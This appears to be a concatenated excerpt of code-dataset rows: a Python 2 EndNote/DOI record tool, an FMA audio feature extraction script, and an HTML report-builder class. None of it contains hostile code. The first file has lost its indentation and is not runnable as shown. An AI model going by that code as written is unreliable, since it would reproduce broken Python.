|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Last Update: 2016.1.25 12:20PM
'''Module for DOI and journal record operation
Also include the journal pdf function'''
import os,sys,re,glob
import time,random,gc
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup
try:
from .doi import DOI
from .crrecord import CRrecord
from .basic import normalizeString,strsimilarity,strdiff
except (ImportError,ValueError) as e:
from doi import DOI
from crrecord import CRrecord
from basic import normalizeString,strsimilarity,strdiff
############# Endnote relate libraray ##############
class EndnoteXML(object):
def __init__(self,fname):
if (fname):
f=open(fname)
self.content=re.sub(r'</?style.*?>','',f.read())
f.close()
else:
self.content=""
self.soup=BeautifulSoup(self.content,'html.parser')
self.records=self.soup.records.contents
self.length=len(self.records)
for i in range(self.length):
self.checktag(i,'titles')
self.checktag(i,'authors')
self.checktag(i,'urls')
if (self.records[i].find('related-urls') is None):
self.addtag(i,'related-urls','',parent='urls')
if (self.records[i].find('pdf-urls') is None):
self.addtag(i,'pdf-urls','',parent='urls')
self.checktag(i,'dates')
self.setdoi(i,self.getdoi(i))
#def __repr__(self):
# return self.soup.encode()
def __str__(self):
return self.soup.encode()
def reset(self,fname):
self.__init__(fname)
def read(self,fname):
self.__init__(fname)
def reads(self,s):
self.content=s
self.soup=BeautifulSoup(self.content,'html.parser')
self.records=self.soup.records.contents
self.length=len(self.records)
for i in range(self.length):
self.checktag(i,'titles')
self.checktag(i,'authors')
self.checktag(i,'urls')
if (self.records[i].find('related-urls') is None):
self.addtag(i,'related-urls','',parent='urls')
if (self.records[i].find('pdf-urls') is None):
self.addtag(i,'pdf-urls','',parent='urls')
self.checktag(i,'dates')
self.setdoi(i,self.getdoi(i))
def writes(self,encoding='utf-8'):
return self.soup.encode(encoding=encoding)
def write(self,fname,encoding='utf-8'):
f=open(fname,'w')
f.write(self.writes(encoding=encoding))
f.close()
def getrecord(self,num):
if (num>=self.length):
return None
return self.records[num]
def checktag(self,num,tag):
if self.records[num].find(tag) is None:
self.addtag(num,tag,value='')
def addtag(self,num,tag,value=None,parent=None):
'''value can be string, tag'''
a=self.soup.new_tag(tag)
if value: a.string=value
if parent:
self.records[num].find(parent).append(a)
else:
self.records[num].append(a)
def gettag(self,num,tag,parent=None,obj=False):
if parent:
if self.records[num].find(parent):
if self.records[num].find(parent).find(tag):
if (obj):
return self.records[num].find(parent).find(tag)
else:
return self.records[num].find(parent).find(tag).string
else:
return ''
else:
return ''
else:
if self.records[num].find(tag):
if (obj):
return self.records[num].find(tag)
else:
return self.records[num].find(tag).string
else:
return ''
def settag(self,num,tag,value,parent=None):
if parent:
if self.records[num].find(parent):
if self.records[num].find(parent).find(tag):
self.records[num].find(parent).find(tag).string=value
else:
self.addtag(num,tag,parent=parent,value=value)
else:
a=self.soup.new_tag(tag)
a.string=value
self.addtag(num,parent,parent=None,value=a)
else:
if self.records[num].find(tag):
self.records[num].find(tag).string=value
else:
self.addtag(num,tag,parent=None,value=value)
def getpath(self):
db=self.soup.findChild("database")
if (db):
return os.path.splitext(db['path'])[0]+'.Data'
else:
return ""
def getdoi(self,num):
doistr=self.gettag(num,"electronic-resource-num")
if (doistr):
doiindex=doistr.find('10.')
else:
doiindex=-1
if (doiindex >=0):
return doistr[doiindex:].lower().strip()
else:
return ""
def setdoi(self,num,value):
self.settag(num,"electronic-resource-num",value)
def gettitle(self,num):
return self.gettag(num,"title")
def settitle(self,num,value):
self.settag(num,"title",value)
def getjournalfull(self,num):
return self.gettag(num,'secondary-title')
def getyear(self,num):
return self.gettag(num,'year','dates')
def setyear(self,num,value):
self.settag(num,'year',value,'dates')
def getvolume(self,num):
return self.gettag(num,'volume')
def setvolume(self,num,value):
self.settag(num,'volume',value)
def getissue(self,num):
return self.gettag(num,'number')
def setissue(self,num,value):
self.settag(num,'number',value)
def getpages(self,num):
return self.gettag(num,'pages')
def setpages(self,num,value):
self.settag(num,'pages',value)
def getnotes(self,num):
return self.gettag(num,'notes')
def setnotes(self,num,value):
self.settag(num,'notes',value)
def geturl(self,num):
urls=self.gettag(num,'related-urls',obj=True)
if (urls):
return [ i.string for i in urls.find_all('url') ]
else:
return []
def seturl(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('related-urls') is not None):
urls=self.gettag(num,'related-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'related-urls',parent='urls')
self.addtag(num,'url',value,'related-urls')
def addurl(self,num,value,first=False):
urls=self.gettag(num,'related-urls',obj=True)
a=self.soup.new_tag('url')
a.string=value
if (urls):
if (not first):
urls.append(a)
else:
urls.insert(0,a)
else:
self.settag(num,'related-urls',a,'urls')
def getpdf(self,num):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
return [ i.string for i in urls.find_all('url') ]
else:
return []
def setpdf(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('pdf-urls') is not None):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'pdf-urls',parent='urls')
self.addtag(num,'url',value,'pdf-urls')
def setpdfs(self,num,value):
'''Note that it will clean all the url!'''
if (self.soup.find('pdf-urls') is not None):
urls=self.gettag(num,'pdf-urls',obj=True)
if (urls):
urls.clear()
else:
self.addtag(num,'pdf-urls',parent='urls')
for url in value:
self.addtag(num,'url',url,'pdf-urls')
def addpdf(self,num,value,first=False):
urls=self.gettag(num,'pdf-urls',obj=True)
a=self.soup.new_tag('url')
a.string=value
if (urls):
if (not first):
urls.append(a)
else:
urls.insert(0,a)
else:
self.addtag(num,'pdf-urls',a,'urls')
def finddoi(self,num,prefix='',issn=''):
title=self.gettitle(num)
doi=DOI(self.getdoi(num))
if (not prefix):
prefix = doi.split('/',1)[0] if doi else ""
volume= self.getvolume(num)
journal=self.getjournalfull(num)
year=self.getyear(num)
pages=self.getpages(num)
self.cr=CRrecord()
try:
# The origin doi maybe true. Find in crossref
if ( doi and self.cr.getfromdoi(doi,fullparse=False) and self.cr.doi):
# Further check title
if (strdiff(doi,self.cr.doi)>=0.85 and \
strsimilarity(normalizeString(title),normalizeString(self.cr.title))>0.75):
return doi
if( volume and pages ):
ops=pages.split('-')
crps=self.cr.pages.split('-')
if (len(ops)>0 and len(crps)>0 and ops[0]==crps[0] and volume==self.cr.volume):
return doi
if( year and pages ):
ops=pages.split('-')
crps=self.cr.pages.split('-')
if (len(ops)>0 and len(crps)>0 and ops[0]==crps[0] and year==self.cr.year):
return doi
print "Origin DOI:",doi,"may be true but record strange..Try title"
keyword=title+" "+journal+" "+year+" "+pages+" "+volume
if (self.cr.getfromtitledoi(keyword,doi,year=year,limit=10,fullparse=False,prefix=prefix)):
if (doi):
if( prefix == self.cr.doi.split('/')[0] and strdiff(doi,self.cr.doi)>=0.85):
return self.cr.doi
else:
print "Error for origin doi: "+doi+"; found: "+self.cr.doi
return ""
return self.cr.doi
if (doi):
if( strdiff(doi,self.cr.doi)>=0.85):
return self.cr.doi
else:
print "Error2 for origin doi: "+doi+"; found: "+self.cr.doi
return ""
else:
return ""
except Exception as e:
print "Error when find doi..",e,"\nRetry..."
return self.finddoi(num,prefix=prefix,issn=issn)
def preprocess(self):
pass
def cleannote(self,num):
note=self.getnotes(num)
notel=note.lower()
if ("time" in notel):
self.setnotes(num,notel[notel.find('time'):])
def cleanallpdf(self,exceptOAPDF=True):
'''Clean PDF record or except OAPDF record'''
for i in range(self.length):
if (not exceptOAPDF):
self.setpdf(i,'')
else:
for pdf in self.getpdf(i):
if "internal-pdf://OAPDF/" in pdf:
self.setpdf(i,pdf)
break
def process(self,fname="",cleannote=False,prefix='',issn='',start=0):
epath=self.getpath()
print "Output",self.length,"to",epath+os.sep+fname
for i in range(start,self.length):
try:
#if (i%100 is 0):
# print
# print "Doing:",i+1,
#else:
# print i+1,
pdfs=self.getpdf(i)
urls=self.geturl(i)
# Fast consider as record process before
hasfound=False
for pdf in pdfs:
if "internal-pdf://OAPDF/" in pdf:
hasfound=True
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
if doi:
self.setdoi(i,"chk: "+doi)
break
if not hasfound:
for url in urls:
if "http://oapdf.sourceforge.net/cgi-bin/" in url:
hasfound=True
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
if doi:
self.setdoi(i,"chk: "+doi)
break
if hasfound:
continue
if (cleannote):
self.cleannote(i)
doistr=self.gettag(i,"electronic-resource-num")
if (doistr and len(doistr)>4 and doistr[:4]=='chk:'):
doi=DOI(self.getdoi(i))
else:
doi=DOI(self.finddoi(i,prefix=prefix,issn=issn))
if doi:
self.setdoi(i,"chk: "+doi)
oapdflink=""
if (doi and doi.is_oapdf()):
oapdflink="http://oapdf.sourceforge.net/cgi-bin/doipage.cgi?doi="+doi
newpdfs=[]
for pdf in pdfs:
pdfpath=pdf.replace("internal-pdf://",epath+os.sep+"PDF"+os.sep)
relpath=pdf.replace("internal-pdf://","")
# should never happen
if (relpath == doi.quote()+".pdf"):
newpdfs.append(pdf)
continue
if (doi):
if (os.path.exists(pdfpath)):
try:
os.renames(pdfpath,epath+os.sep+"PDF"+os.sep+doi.quote()+".pdf")
newpdfs.append("internal-pdf://"+doi.quote()+".pdf")
except:
print "Can't rename:",pdf,'to',doi.quote()+".pdf"
newpdfs.append(pdf)
continue
else:
print "Maybe error for the record",doi,"with pdf path:",pdf,'; Try finding..',
pdfdir=os.path.split(pdfpath)[0]
if (os.path.exists(pdfdir)):
fs=glob.glob(pdfdir+os.sep+'*.pdf')
if (len(fs)==1):
try:
os.renames(fs[0],epath+os.sep+"PDF"+os.sep+doi.quote()+".pdf")
newpdfs.append("internal-pdf://"+doi.quote()+".pdf")
print "Find",fs[0],'and rename!'
except:
print "Can't rename:",fs[0],'to',doi.quote()+".pdf"
newpdfs.append(pdf)
continue
else:
print "Can't find.."
newpdfs.append(pdf)
continue
else:
newpdfs.append(pdf)
continue
else:
print "Blank doi for file:",pdf
newpdfs.append(pdf)
continue
if (oapdflink):
newpdfs.append("internal-pdf://OAPDF/"+doi.quote()+".pdf")
self.setpdfs(i,newpdfs)
# Set the urls
if (oapdflink and oapdflink not in urls):
self.addurl(i,oapdflink,first=True)
except Exception as e:
print "Error at ", i, 'since: ',e
#return 1
if fname:
self.write(fname)
return 0 |
<filename>feature_extraction_deep_learning/custom_module/extract_cqt_mel_spect_fma.py
import numpy
from audioread import NoBackendError
import pandas
import sys
MODULE_PATH = '/home/macbookretina/automatic-music-genre-classification/feature_extraction_deep_learning'
sys.path.insert(1, MODULE_PATH)
from custom_module.utilities import *
# def process_and_save(cqts, mel_spects, genre_labels, count):
# # check if all the lists are equal in length and throw an exception if not
# path = '/home/macbookretina/s3-bucket/data'
# count = str(count)
# print('checking if the lists are equal in size.')
# is_all_equal_in_length = len(cqts) == len(mel_spects) == len(genre_labels)
# assert (is_all_equal_in_length), \
# 'cqts: ' + str(len(cqts)) + \
# ' mel_spects: ' + str(len(mel_spects)) + \
# ' genre_labels: ' + str(len(genre_labels))
# # convert the lists to arrays so it can be stacked
# print('converting lists to numpy array')
# cqts = numpy.array(cqts)
# mel_spects = numpy.array(mel_spects)
# length = len(cqts)
# genre_labels = numpy.array(genre_labels).reshape(length, 1)
# data_sources = numpy.array(['fma']*length).reshape(length, 1)
# data_cqts = {
# 'genre_labels': genre_labels,
# 'data_sources': data_sources,
# 'cqts': cqts
# }
# data_mel = {
# 'genre_labels': genre_labels,
# 'data_sources': data_sources,
# 'cqts': cqts
# }
# # create dataframes and save as csvs
# print('stacking array & saving as csv')
# # cqt_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, cqts)))
# # mel_spect_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, mel_spects)))
# cqt_df = pandas.DataFrame(data_cqts)
# mel_spect_df = pandas.DataFrame(data_mel)
# cqt_df.to_csv(path + '/cqt_fma_' + count + '.csv')
# mel_spect_df.to_csv(path + '/mel_spect_fma_' + count + '.csv')
# print('saved batch: ' + count + '!!')
# return [], [], []
def extract_from_fma():
    """Extract constant-Q transforms and mel-spectrograms from the FMA small subset.

    Reads FMA metadata to map track ids to top genres, walks the fma_small
    audio folders, extracts per-track CQT and mel-spectrogram features
    (resized to a fixed width of 2812 frames), and accumulates them with
    their genre labels. Relies on utilities globals: MOUNTED_DATASET_PATH,
    GENRES, load, extract_cqt, extract_mel_spect, feedback.
    """
    # Collect track id and genres of tracks in the small subset.
    print('collecting track id and genres of tracks in the small subset of fma dataset')
    tracks = load(MOUNTED_DATASET_PATH + '/fma_metadata/tracks.csv')
    fma_full = tracks[[('set', 'subset'), ('track', 'genre_top')]]
    small_subset = fma_full[('set', 'subset')] == 'small'
    fma_small = fma_full[small_subset]
    # BUG FIX: the original used `pd.DataFrame`, but this module imports the
    # package as `pandas` (no `pd` alias), which raises NameError at runtime.
    fma_small = pandas.DataFrame({
        'subset': fma_small[('set', 'subset')],
        'label': fma_small[('track', 'genre_top')]
    })
    print('collected track id and genres of tracks in the small subset of fma')

    # Accumulators for extracted features and labels.
    cqts = []
    mel_spects = []
    genre_labels = []
    print('extracting log-mel and mel-spectogram from fma dataset')
    count = 0
    for directory in os.scandir(MOUNTED_DATASET_PATH + '/fma_small'):
        if directory.is_dir():
            for file in os.scandir(directory.path):
                if file.is_file():
                    # Track id is the zero-padded filename stem, e.g. "000123.mp3".
                    track_id = int(file.name[:-4].lstrip('0'))
                    genre_label = fma_small.at[track_id, 'label'].lower().replace('-', '')
                    if genre_label in GENRES:
                        try:
                            scaled_cqt = extract_cqt(file)
                            scaled_mel_spect = extract_mel_spect(file)
                        except RuntimeError:
                            print('RuntimeError')
                            continue
                        except NoBackendError:
                            print('NoBackendError')
                            continue
                        # Adjust shape to the most common frame count (2812).
                        if scaled_cqt.shape[1] != 2812:
                            scaled_cqt.resize(84, 2812, refcheck=False)
                        if scaled_mel_spect.shape[1] != 2812:
                            scaled_mel_spect.resize(128, 2812, refcheck=False)
                        genre_labels.append(genre_label)
                        # Flatten so each track becomes one feature row.
                        cqts.append(scaled_cqt.flatten())
                        mel_spects.append(scaled_mel_spect.flatten())
                        feedback(file, genre_label)
                        count = count + 1

    # Check all the lists are equal in length and fail loudly if not.
    print('checking if the lists are equal in size.')
    is_all_equal_in_length = len(cqts) == len(mel_spects) == len(genre_labels)
    assert (is_all_equal_in_length), \
        'cqts: ' + str(len(cqts)) + \
        ' mel_spects: ' + str(len(mel_spects)) + \
        ' genre_labels: ' + str(len(genre_labels))

    # Convert to arrays (stacking/saving currently disabled below).
    print('converting lists to numpy array')
    cqts = numpy.array(cqts)
    mel_spects = numpy.array(mel_spects)
    length = len(cqts)
    genre_labels = numpy.array(genre_labels).reshape(length, 1)
    data_sources = numpy.array(['fma'] * length).reshape(length, 1)
    # # create dataframes and save as csvs
    # print('stacking array & saving as csv')
    # cqt_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, cqts)))
    # mel_spect_df = pandas.DataFrame(numpy.hstack((genre_labels, data_sources, mel_spects)))
    # cqt_df.to_csv(path + '/cqt_fma.csv')
    # mel_spect_df.to_csv(path + '/mel_spect_fma.csv')
    # print('done')
# Script entry point.
# BUG FIX: the original line ended with a stray ' |' (concatenation
# artifact), which is a syntax error.
if __name__ == '__main__':
    extract_from_fma()
<gh_stars>1-10
import re
import os
import mpld3
import base64
import plotly
import matplotlib
from io import BytesIO
from mpld3._server import serve
from matplotlib import pyplot as plt
import pandas as pd
# Resolve the package-relative resources directory once at import time so
# the report favicon can be referenced by absolute path.
current_path = os.path.dirname(__file__)
resources_path = os.path.abspath(os.path.join(current_path, 'resources'))
favicon_path = os.path.join(resources_path, 'logo_2.ico')
class Reportity:
    """Incrementally builds a standalone HTML report.

    Content is appended in call order: headers, paragraphs, pandas
    DataFrames (rendered as Bootstrap tables) and matplotlib / plotly
    figures. A clickable "Figures List" index is spliced in below the
    title when the document is finalized. The finished report can be
    served in a browser (``show``) or written to disk (``save_as_html``).

    Parameters
    ----------
    title : str
        Used both as the page ``<title>`` and as the top-level heading.
    include_plotly_js : bool, optional
        When True, embed the full plotly.js source with the first plotly
        figure (self-contained but much larger file). Default False; the
        CDN ``<script>`` tag in the page header is relied on instead.
    """

    def __init__(
        self,
        title,
        include_plotly_js=False,
    ):
        self.include_plotlyjs = include_plotly_js
        # NOTE(review): attribute keeps its original (misspelled) name so
        # any external code that reads it continues to work.
        self.fist_figure = True
        self.figures_next_id = 0
        self.figures_href = ''
        self.html_ended = False
        # Doubled braces ({{ }}) are literal CSS braces under str.format.
        # (Fixed: the .plotly-graph-div rule used the invalid property
        # 'hight'.)
        self.html = '''
            <!DOCTYPE html>
            <html lang="en">
            <head>
                <style>
                    body {{
                        margin:20px;
                        padding:20px;
                    }}
                    div {{
                        margin: 25px;
                    }}
                    .center {{
                        display: block;
                        margin-left: auto;
                        margin-right: auto;
                        width: 50%;
                    }}
                    .plotly-graph-div {{
                        display: block;
                        margin-left: auto;
                        margin-right: auto;
                        width: auto;
                        height: auto;
                    }}
                    hr {{
                        display: block;
                        margin-top: 0.5em;
                        margin-bottom: 0.5em;
                        margin-left: auto;
                        margin-right: auto;
                        border-style: inset;
                        border-width: 1px;
                    }}
                </style>
                <title>{title}</title>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1">
                <link rel='icon' href={favicon_path} type='image/ico'/ >
                <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
                <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
                <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
                <script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
            </head>
            <body>
        '''.format(
            title=title,
            favicon_path=favicon_path,
        )
        # 'figures_hrefs' is a placeholder replaced with the figure index
        # by __end_html__().
        self.html += '<h1 align="center", style="font-size:400%">{title}</h1><hr>figures_hrefs'.format(
            title=title,
        )

    def __end_html__(
        self,
    ):
        """Close the document and splice the figures index into the
        'figures_hrefs' placeholder. Idempotent: subsequent calls are
        no-ops, so show()/save_as_html() can both be called."""
        if self.html_ended:
            return
        self.html_ended = True
        self.html += '''
            </body>
        </html>
        '''
        self.figures_href = '<h1 >Figures List</h1>' + self.figures_href
        # str.replace instead of re.sub: figure names may contain
        # backslashes or '\\g<...>' sequences, which re.sub would
        # misinterpret in the replacement string.
        self.html = self.html.replace(
            'figures_hrefs',
            self.figures_href,
        )

    def print_header(
        self,
        text,
        level,
    ):
        """Append an <h{level}> heading (level 1-6, smaller = bigger)."""
        self.html += '<h{level}>{text}</h{level}>'.format(
            level=level,
            text=text,
        )

    def print_paragraph(
        self,
        text,
    ):
        """Append a paragraph of text wrapped in its own <div>."""
        self.html += '<div><p>{text}</p></div>'.format(
            text=text,
        )

    def print_dataframe(
        self,
        dataframe,
        max_rows=100,
    ):
        """Append a pandas DataFrame as a striped Bootstrap table.

        Rows beyond `max_rows` are elided by DataFrame.to_html.
        """
        html_table = '<div class="container">'
        html_table += dataframe.to_html(
            max_rows=max_rows,
        )
        html_table += '</div>'
        # Swap pandas' default <table ...> tag for Bootstrap classes.
        html_table = re.sub(
            pattern=r'<table.+>',
            repl='<table class="table table-hover table-striped">',
            string=html_table,
        )
        self.html += html_table

    def print_figure(
        self,
        figure,
        figure_name=None,
        as_image=False,
    ):
        """Append a matplotlib or plotly figure with a caption and an
        entry in the figures index.

        If `figure_name` is None, the figure's own title is used (falling
        back to 'figure'). `as_image` forces a static PNG rendering for
        matplotlib figures.
        """
        fig_html, figure_name = self._get_fig_html(
            figure=figure,
            figure_name=figure_name,
            as_image=as_image,
        )
        self.html += self._register_figure_anchor(figure_name)
        self.html += fig_html

    def print_2_figures(
        self,
        figure_left,
        figure_right,
        figure_name=None,
        as_image=False,
    ):
        """Append two figures side by side under a single caption.

        The caption is `figure_name`, or the left figure's derived name
        when no name is given (previously the literal string 'None' was
        rendered in that case).
        """
        fig_html_left, figure_name_left = self._get_fig_html(
            figure=figure_left,
            figure_name=figure_name,
            as_image=as_image,
        )
        fig_html_right, _ = self._get_fig_html(
            figure=figure_right,
            figure_name=figure_name,
            as_image=as_image,
        )
        display_name = figure_name if figure_name else figure_name_left
        figure_name_html = self._register_figure_anchor(display_name)
        fig_html = '''
            <div style="height: 90%; width:95%; float: center; display:flex;">
                <div style="flex: 1; margin-right: 5px;">
                    {fig_left}
                </div>
                <div style="flex: 1; margin-right: 5px;">
                    {fig_right}
                </div>
            </div>
            <br>
        '''.format(
            fig_left=fig_html_left,
            fig_right=fig_html_right,
        )
        self.html += figure_name_html
        self.html += fig_html

    def show(
        self,
    ):
        """Finalize the document and serve it in the default browser."""
        self.__end_html__()
        serve(self.html)

    def save_as_html(
        self,
        path,
    ):
        """Finalize the document and write it to `path`."""
        self.__end_html__()
        with open(
            file=path,
            mode='w',
        ) as f:
            f.write(self.html)

    def save_as_pdf(
        self,
        path,
    ):
        """Not implemented yet; always raises NotImplementedError."""
        self.__end_html__()
        raise NotImplementedError

    def _register_figure_anchor(
        self,
        figure_name,
    ):
        """Assign the next figure id, add a link for it to the figures
        index, and return the caption <div> to place above the figure."""
        figure_id = self._get_next_id()
        self.figures_href += '<a href="#{figure_id}">{figure_name}</a><br>'.format(
            figure_id=figure_id,
            figure_name=figure_name,
        )
        return '<div><p id="{figure_id}">{figure_name}</p></div>'.format(
            figure_id=figure_id,
            figure_name=figure_name,
        )

    def _get_fig_html(
        self,
        figure,
        figure_name,
        as_image,
    ):
        """Dispatch conversion on figure type; return (html, name).

        Raises TypeError for unsupported types (previously this path died
        with an UnboundLocalError).
        """
        if isinstance(figure, matplotlib.figure.Figure):
            return self._convert_matplotlib_figure(
                figure=figure,
                as_image=as_image,
                figure_name=figure_name,
            )
        if isinstance(figure, plotly.graph_objs.Figure):
            return self._convert_plotly_figure(
                figure=figure,
                figure_name=figure_name,
            )
        raise TypeError(
            'unsupported figure type: {}'.format(type(figure))
        )

    def _convert_matplotlib_figure(
        self,
        figure,
        figure_name,
        as_image,
    ):
        """Render a matplotlib figure to HTML.

        Tries an interactive mpld3 rendering unless `as_image` is set,
        falling back to an embedded PNG when mpld3 cannot handle the
        figure. Returns (fig_html, figure_name).
        """
        if not figure_name:
            try:
                figure_name = figure.axes[0].get_title()
            except Exception:  # figure may have no axes / no title
                figure_name = 'figure'
        if as_image:
            return self._get_figure_image_html(figure=figure), figure_name
        try:
            # Center the mpld3 output by patching its outermost <div>.
            fig_html = mpld3.fig_to_html(figure).split('<div ')
            fig_html = fig_html[0] + '<div align="center" ' + fig_html[1]
        except Exception:  # mpld3 can't render every artist; use a PNG
            fig_html = self._get_figure_image_html(figure=figure)
        return fig_html, figure_name

    def _get_figure_image_html(
        self,
        figure,
    ):
        """Render a matplotlib figure to a base64-embedded <img> tag."""
        buf = BytesIO()
        figure.savefig(
            buf,
            format='png',
        )
        data = base64.b64encode(buf.getbuffer()).decode('ascii')
        return '<img src=\'data:image/png;base64,{data}\' class="center" />'.format(
            data=data,
        )

    def _convert_plotly_figure(
        self,
        figure,
        figure_name,
    ):
        """Render a plotly figure to an HTML <div>.

        plotly.js itself is embedded only for the first figure, and only
        when the report was created with include_plotly_js=True.
        Returns (fig_html, figure_name).
        """
        if not figure_name:
            try:
                figure_name = figure['layout']['title']['text']
            except (KeyError, TypeError):  # TypeError when title is None
                figure_name = 'figure'
        if figure['layout']['width']:
            # A fixed width would defeat the auto-centering CSS rule.
            figure['layout']['width'] = None
        if self.fist_figure:
            include_plotlyjs = self.include_plotlyjs
            self.fist_figure = False
        else:
            include_plotlyjs = False
        fig_html = plotly.offline.plot(
            figure,
            include_plotlyjs=include_plotlyjs,
            output_type='div',
        )
        return fig_html, figure_name

    def _get_next_id(
        self,
    ):
        """Return the next 1-based figure id (used as the HTML anchor)."""
        self.figures_next_id += 1
        return self.figures_next_id
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.